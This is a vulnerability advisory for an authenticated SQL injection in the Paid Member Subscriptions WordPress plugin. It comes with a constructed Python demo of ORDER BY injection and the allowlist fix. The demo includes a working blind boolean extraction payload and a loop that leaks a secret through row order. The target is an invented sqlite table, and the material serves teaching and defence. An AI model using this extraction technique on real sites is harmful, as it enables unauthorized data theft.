CVE-2021-24728

Paid Member Subscriptions < 2.4.2 - Authenticated SQL Injection

EPSS: 1.7%
CWE: CWE-89 (SQL Injection)
Vexday Risk Score: 3 (Low)
SSVC decision (CISA): Track (no exploitation signal, monitor)
KEV: no
Lifecycle: 13 Sep 2021, published on NVD
Recommendation: Monitor; no exploitation signal at the moment.
The Membership & Content Restriction – Paid Member Subscriptions WordPress plugin before 2.4.2 did not sanitise, validate or escape its order and orderby parameters before using them in SQL statements, leading to authenticated SQL injection in the Members and Payments pages. Because these values end up in an ORDER BY clause, they cannot be protected by prepared-statement parameter binding; the fix is to validate them against an allowlist of column names and sort directions before they reach the query text. Update to version 2.4.2 or later.
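The following is an added, constructed illustration of the bug class described above; it is not the plugin's code and uses Python with sqlite3 instead of the plugin's PHP so that it runs offline. The table, column names, secret value and payloads are all made up. It shows the unchecked interpolation, why binding the ORDER BY value as a query parameter silently does nothing (the same effect as a `%s` placeholder in WordPress's `$wpdb->prepare()`), a blind boolean extraction through the row order, and the allowlist fix that stops it.

```python
"""Constructed demonstration of the CWE-89 pattern behind this advisory:
user-controlled ORDER BY column and direction strings interpolated into SQL,
and the allowlist fix. Table, columns, secret and payloads are invented for
illustration; this is not the Paid Member Subscriptions plugin's code."""
import sqlite3
import string

ALLOWED_ORDERBY = {"id", "username", "status"}   # hypothetical column allowlist
ALLOWED_ORDER = {"ASC", "DESC"}
ID_ORDER = ["carol", "alice", "bob"]             # rows sorted by id (see make_db)
NAME_ORDER = ["alice", "bob", "carol"]           # rows sorted by username


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a members table plus a table holding data the
    attacker wants to read. Sample rows are constructed so that sorting by id
    and sorting by username give different orders."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, status TEXT);
        INSERT INTO members VALUES (1, 'carol', 'active'),
                                   (2, 'alice', 'pending'),
                                   (3, 'bob',   'active');
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, api_key TEXT);
        INSERT INTO secrets VALUES (1, 'k-9f2a');
    """)
    return conn


def list_members_vulnerable(conn, orderby: str, order: str) -> list:
    """The bug class: both request parameters land in the SQL text unchecked."""
    sql = f"SELECT username FROM members ORDER BY {orderby} {order}"
    return [row[0] for row in conn.execute(sql)]


def list_members_bound(conn, orderby: str) -> list:
    """Why 'just use prepared statements' does not work here: a bound value is
    a string constant, so every row gets the same sort key and the ORDER BY is
    a no-op. ($wpdb->prepare('... ORDER BY %s', $col) behaves the same way.)"""
    sql = "SELECT username FROM members ORDER BY ?"
    return [row[0] for row in conn.execute(sql, (orderby,))]


def list_members_fixed(conn, orderby: str, order: str) -> list:
    """Allowlist both values and fall back to safe defaults; only then is it
    safe to place them in the query text (quoted as an identifier)."""
    if orderby not in ALLOWED_ORDERBY:
        orderby = "id"
    order = order.upper()
    if order not in ALLOWED_ORDER:
        order = "ASC"
    sql = f'SELECT username FROM members ORDER BY "{orderby}" {order}'
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(guess: str) -> str:
    """orderby payload for blind, boolean-based extraction: the CASE sorts by
    id when the guess is a prefix of the secret and by username otherwise, so
    the order of the returned rows is the oracle (guess alphabet has no quotes)."""
    return (f"(CASE WHEN (SELECT api_key FROM secrets WHERE id = 1) LIKE '{guess}%' "
            f"THEN id ELSE username END)")


def leak_secret(conn, max_len: int = 8,
                alphabet: str = string.ascii_lowercase + string.digits + "-") -> str:
    """Recover the secret one character at a time through the vulnerable listing."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if list_members_vulnerable(conn, oracle_payload(known + ch), "ASC") == ID_ORDER:
                known += ch
                break
        else:
            break   # no character extends the prefix: end of secret reached
    return known


if __name__ == "__main__":
    db = make_db()
    print("leaked via orderby:", leak_secret(db))
    print("same payload against fixed code:",
          list_members_fixed(db, oracle_payload("k"), "ASC"))
```

Against `list_members_fixed`, every unknown `orderby` value collapses to the default column, so the row order no longer depends on the injected condition and the oracle disappears; the direction parameter gets the same treatment, since `order` is an injection point in its own right.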
